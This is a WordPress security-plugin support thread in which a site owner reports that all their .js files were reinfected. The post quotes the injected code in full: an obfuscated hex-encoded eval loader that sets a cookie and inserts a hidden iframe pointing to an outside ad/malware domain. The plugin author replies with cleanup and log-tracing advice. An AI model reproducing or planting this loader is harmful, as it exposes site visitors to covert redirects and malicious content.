• Resolved rrzzzkk

    (@rrzzzkk)


    Hello Eli!
    Thank you so much for this amazing plugin. It really helped me a lot…
    but today when i scanned my site it’s showing every .js file as potential threat and every file contain this code /*c8e6fad044445000dfc4685b81a275df*/;(function(){var yyrkbrek="";var itbkdhte="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822333962646230383030633861303131366464663232666637346336663539393122293b69662820783333647120213d2022393236386137613564623365363431656236343830666439376634646663643622297b783232627128223339626462303830306338613031313664646632326666373463366635393931222c223932363861376135646233653634316562363438306664393766346466636436222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f63646e2e7061726177616e61706f6c792e696e666f2f6d656761616476657274697a652f3f6259786a7a666f687a6555764c4e586346464d623d5947784d6c654878777926675874426e596e4f4c45626a525078795344733d6c7a746a4d456857534d266b6579776f72643d323666356238396162316266376665623462393631636430616138353664353826494e497548587755554d54793d6e6c4949587562646626774f6959776b43437848744d6e6c42434f6e556b623d6e596772784e577a784e4d4b6e554b26587443526648424b53703d6b784b6e5567264e42515548475049563d6e6d697066446e46764e6c4e6a6a2669496c74667166463d50424b4d4b4154797276223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var szsseryd=0;szsseryd<itbkdhte.length;szsseryd+=2){yyrkbrek=yyrkbrek+parseInt(itbkdhte.substring(szsseryd,szsseryd+2), 16)+",";}yyrkbrek=yyrkbrek.substring(0,yyrkbrek.length-1);eval(eval('String.fromCharCode('+yyrkbrek+')'));})();/*c8e6fad044445000dfc4685b81a275df*/ can you please help me this even though i removed the code, set file permission to 555 but its keep getting back…
    My site https://www.funnycenter.net/

    https://www.ads-software.com/plugins/gotmls/

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Author Eli

    (@scheeeli)

    I added this new variant to my definition updates so that it is now Identified as a Known Threat and my plugin can automatically remove it for you.

    Changing the permissions on those files won’t help because the hackers can easily reset the permissions to make them writable again. It may also cause problems for you later when you go to install an update or upgrade those files.

    What you need to do it find the script that is responsible for writing that malicious code to those JS files. The next time they get injected with that script you need to check the timestamps on the files before you clean them. Then you can look in your access_log files to see what URLs were being call on at that exact time. That will usually pinpoint the exploit or back-door that is letting in hackers.

    Let me know if you find anything else that’s new ??

    Aloha, Eli

    Thread Starter rrzzzkk

    (@rrzzzkk)

    Thanks! as usual it worked… one of the best plugin, KEEP UP THE GOOD WORK, GOD BLESS YOU.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Found weird code in every .js file – Please Help’ is closed to new replies.